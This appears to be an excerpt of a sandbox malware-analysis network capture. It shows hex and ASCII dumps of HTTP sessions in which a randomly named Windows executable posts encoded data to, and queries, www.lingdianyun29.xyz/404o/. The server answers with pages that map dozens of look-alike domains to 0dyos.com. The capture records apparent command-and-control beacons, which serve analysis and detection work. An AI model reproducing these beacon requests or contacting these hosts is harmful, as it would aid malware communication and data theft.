2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:04.485394001 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:04.486469030 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:04.486599922 CET1236INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dyvs.xyz", "https://0
                                                                Dec 9, 2024 08:46:04.486615896 CET448INData Raw: 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 30 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b
                                                                Data Ascii: , "https://0dyos.com");mappings.set("lingdianyun20.top", "https://0dyos.com");mappings.set("www.0dianyun4.xyz", "https://0dyos.com");mappings.set("pay.lingdianyun1.xyz", "https://0dyos.com");mappings.set("0dianyun8.xyz", "https
                                                                Dec 9, 2024 08:46:04.486888885 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:04.487066984 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:04.487149000 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:04.487374067 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:04.487827063 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s
                                                                Dec 9, 2024 08:46:04.604984999 CET1236INData Raw: 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 33 34 2e 74 6f
                                                                Data Ascii: s.set("lingdianyun20.xyz", "https://0dyos.com");mappings.set("lingdianyun34.top", "https://0dyos.com");mappings.set("lingdianyun24.top", "https://0dyos.com");mappings.set("lingdianyun31.top", "https://0dyos.com");mappings.set("


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.1249762121.43.155.35801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:05.807804108 CET1838OUTPOST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 48 6f 48 65 77 37 52 69 66 52 78 66 62 74 70 61 42 65 4e 65 6f 6b 55 67 62 44 34 6b 44 50 52 51 53 41 4b 46 31 48 34 33 66 37 75 77 68 4b 5a 51 38 2b 6f 75 6d 42 46 43 58 30 33 32 56 6b 42 57 62 50 74 7a 4d 56 42 66 72 4d 75 37 76 4a 53 36 62 64 52 4b 45 33 54 33 71 6e 4a 6a 77 6f 59 49 36 67 67 4c 32 49 7a 42 67 31 42 46 32 46 35 57 31 37 78 75 4b 45 62 58 58 43 73 71 30 4b 74 36 47 46 50 51 6c 37 55 73 4a 6e 46 7a 47 68 47 77 6e 4b 43 44 6f 56 55 42 77 64 32 49 71 77 62 38 68 6b 67 57 7a 6c 48 38 4b 36 6b 56 37 74 45 33 69 73 4e 63 49 30 62 37 2b 76 63 51 56 78 59 76 47 51 62 61 72 52 75 67 31 5a 47 68 58 54 34 67 6a 32 56 6e 58 41 37 4c 44 58 34 2b 2f 58 45 35 58 50 47 44 56 52 68 34 59 6c 37 36 49 54 51 79 56 56 55 59 34 63 47 31 6a 76 4d 76 6a 77 30 78 51 39 73 68 43 53 62 62 55 75 48 44 65 58 6d 59 6e 30 59 2f 73 6e 47 65 6f 4e 7a 6f 64 50 36 65 30 4b 44 4d 77 64 50 35 32 47 44 50 4f 69 66 6a 4b 7a 41 67 77 41 4b 53 6e 39 72 47 36 75 4e 6b [TRUNCATED]
                                                                Data Ascii: Ebfx6=bIpwujxH1mQxHoHew7RifRxfbtpaBeNeokUgbD4kDPRQSAKF1H43f7uwhKZQ8+oumBFCX032VkBWbPtzMVBfrMu7vJS6bdRKE3T3qnJjwoYI6ggL2IzBg1BF2F5W17xuKEbXXCsq0Kt6GFPQl7UsJnFzGhGwnKCDoVUBwd2Iqwb8hkgWzlH8K6kV7tE3isNcI0b7+vcQVxYvGQbarRug1ZGhXT4gj2VnXA7LDX4+/XE5XPGDVRh4Yl76ITQyVVUY4cG1jvMvjw0xQ9shCSbbUuHDeXmYn0Y/snGeoNzodP6e0KDMwdP52GDPOifjKzAgwAKSn9rG6uNk/sgg2XYptXO3g+yHwBcf9ZkNyQ1Ayr7tSsLW1Fco4nDZDZHBz0jmNXHwikIoRm7MSNBwJwFC1tpiLTcrdL58f4xfzn8gdbEyd31WP+doOOQKaxecDE4XyUVvXkEP+jYQ1+a2zuIA/Cy4lZj0d1A0S82pER81at1zLtV85j34Yhm8Wghkgcg/qqa803LsDV5eIDiJF4SdRiOS67AIEYgDYLz3aCyKQSV94gc7g/Ev6NDNuHb2kjg0EgCRE+Tbl07E3nbdYiejgMk56oo788eI+2D5f85TNUBezxkCNkbAxpUEZE+Adawwxe9wARpzuBrb8RFjqgEjsOnVoNuJf8ZlcSa08egq2enhYjnoIUTbYiq9J9ynuabAPlaPg71yHfnPNzyl6RmPYElovU6Lq0AqZSd05WE+YLzbsStaJeu3z/Mwityg4+bsxD4hoDe0G/AF2gWjXYPwEvJlnlrTOqcpwzayrAD0IpxVzviki+OL9RoamUFI+qDgit8hvxpe/uxDIcKxaNqaTXSiZevKQFmAi5v5sXZKp8LsrKU8rxB5KKEIYlxleXu6yLYSqYf2wgMoTCizOAIHbygyFUArx6fMbilEBJKrxsYGvJJ5P0tx4cCSfpfXodkJ0MGdXUYvsMqM/py++wrpz8BJwHeU+sNePw8U3XCukOqxU+ [TRUNCATED]
                                                                Dec 9, 2024 08:46:07.138952971 CET1236INHTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:07.138994932 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:07.139535904 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:07.139607906 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                Dec 9, 2024 08:46:07.140130043 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                Dec 9, 2024 08:46:07.140208006 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                Dec 9, 2024 08:46:07.140789986 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:07.140877962 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:07.141489029 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:07.141551018 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:07.258433104 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.1249763121.43.155.35801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:08.468229055 CET537OUTGET /404o/?Njld=LDTtwxbX2vi0G&Ebfx6=WKBQtURp4mxoG42HvJVFdxkBeoRQKLcKkncaZCQ6BKNKWWSe5DM6Y469mdl3/OFUlQwZCGrNWgxnPoxBbE5j38LAsICWCsVDGGe9oFVLx/4b7CRN5YGXwG8= HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:46:09.815165997 CET1236INHTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:09.815220118 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:09.815571070 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:09.815638065 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                Dec 9, 2024 08:46:09.816328049 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                Dec 9, 2024 08:46:09.816370964 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
